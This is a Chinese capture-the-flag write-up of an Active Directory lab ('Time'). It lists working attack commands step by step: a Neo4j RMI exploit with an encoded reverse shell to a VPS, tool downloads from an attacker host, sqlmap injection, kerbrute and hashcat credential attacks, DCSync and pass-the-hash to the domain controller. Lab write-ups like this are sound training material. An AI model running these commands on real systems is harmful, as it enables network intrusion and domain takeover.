:声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关
现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!
靶场简介
获取入口机权限
利用exp:https://github.com/zwjjustdoit/CVE-2021-34371.jar
攻击者:java -jar rhino_gadget.jar rmi://47.92.156.112:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNpcC8zMzk5IDA+JjEK}|{base64,-d}|{bash,-i}"nc -lvnp 3399
获得flag01: flag{9c0a610e-bf47-4b90-a31f-f3b241551e43}
内网横向
通过fscan对当前c段进行扫描
curl http://vpsip:8001/fscan_amd64 --output fscanchmod +x ./fscan./fscan -h 172.22.6.36/24
$ ./fscan -h 172.22.6.36/24___ _/ _ ___ ___ _ __ __ _ ___| | __/ /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______ (__| | | (_| | (__| <____/ |___/___|_| __,_|___|_|_fscan version: 1.8.2start infoscantrying RunIcmp2The current user permissions unable to send icmp packetsstart ping(icmp) Target 172.22.6.12 is alive(icmp) Target 172.22.6.25 is alive(icmp) Target 172.22.6.36 is alive(icmp) Target 172.22.6.38 is alive[*] Icmp alive hosts len is: 4172.22.6.36:7687 open172.22.6.25:445 open172.22.6.12:445 open172.22.6.25:139 open172.22.6.12:139 open172.22.6.25:135 open172.22.6.12:135 open172.22.6.38:80 open172.22.6.38:22 open172.22.6.36:22 open172.22.6.12:88 open[*] alive ports len is: 11start vulscan[*] NetInfo:[*]172.22.6.12[->]DC-PROGAME[->]172.22.6.12[*] NetInfo:[*]172.22.6.25[->]WIN2019[->]172.22.6.25[*] WebTitle: http://172.22.6.38 code:200 len:1531 title:后台登录[*] NetBios: 172.22.6.12 [+]DC DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393[*] 172.22.6.12 (Windows Server 2016 Datacenter 14393)[*] NetBios: 172.22.6.25 XIAORANGWIN2019[*] WebTitle: https://172.22.6.36:7687 code:400 len:50 title:None
使用frp进入目标内网
curl http://vpsip:8001/frpc --output frpccurl http://vpsip:8001/frpc.ini --output frpc.inichmod +x ./frpcnohup ./frpc -c frpc.ini &
sql注入:
访问 http://172.22.6.38,是一个登录页面,抓取数据包,使用sqlmap测试注入
python3 sqlmap.py -r tests1.txt --random-agent
获取当前库的内容
python3 sqlmap.py -r tests1.txt --random-agent --dbms=mysql --current-dbpython3 sqlmap.py -r tests1.txt --random-agent --dbms=mysql -D oa_db --tablespython3 sqlmap.py -r tests1.txt --random-agent --dbms=mysql -D oa_db -T oa_f1Agggg --dump
得到flag02:flag{b142f5ce-d9b8-4b73-9012-ad75175ba029}
导出oa_admin表
+----+------------------+---------------+| id | password | username |+----+------------------+---------------+| 1 | bo2y8kAL3HnXUiQo | administrator |+----+------------------+---------------+
导出oa_users表
chenyan@xiaorang.lab[email protected]........
172.22.6.12 是域控,把oa_users的结果做成字典,通过kerbrute成功爆破出21个用户名
./kerbrute userenum --dc 172.22.6.12 -d xiaorang.lab user.txt
hashcat -m 18200 -a 0 roasting.txt pass.txt --force
利用刚刚爆破出的zhangxin凭证,通过https://github.com/lzzbb/Adinfo获取域内信息
./Adinfo_darwin -d xiaorang.lab --dc 172.22.6.12 -u zhangxin -p strawberry
发现yuxuan对应的SIDHistory用户是Administrator
在域内每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。SID History是在域迁移过程中需要使用的一个属性。
如果域用户要从A迁移到B域,那么在B域中该用户的SID会随之改变,导致迁移后的用户不能再访问A域的资源。SID History的作用就是在域迁移后保持域用户对A域的访问权限,将原来的SID添加到迁移后用户的SID History属性中;即迁移后的用户保持原有权限,还是能访问原来可以访问的资源。
登陆普通域机器172.22.6.25(WIN2019),查看当前登陆用户
quser
有的用户为了方便,会在注册表中配置密码和其他相关信息,用来自动执行登录过程。
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
获得凭证:yuxuan/Yuxuan7QbrgZ3L
由于yuxuan用户sidhistory属性对应为administrator,可以直接dcsync获得域管administrator的hash
python3 secretsdump.py xiaorang.lab/yuxuan:Yuxuan7QbrgZ3L@172.22.6.12 -just-dc-user administrator
administrator的hash为:04d93ffd6f5f6e4490e0de23f240a5e9
利用域管hash通过wmiexec到当前机器(172.22.6.25-WIN2019):
python3 wmiexec.py xiaorang/[email protected] -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
获得flag03: flag{7ca4d9af-06d5-406f-ba65-590e0453fc5e}
利用域管hash pth到DC:
python3 wmiexec.py xiaorang/[email protected] -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
获得flag04: flag{90c9c38d-0e87-481c-a52f-b96223a3b7d5}
原文始发于微信公众号(猫蛋儿安全):【内网攻防】春秋云镜-Time-WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论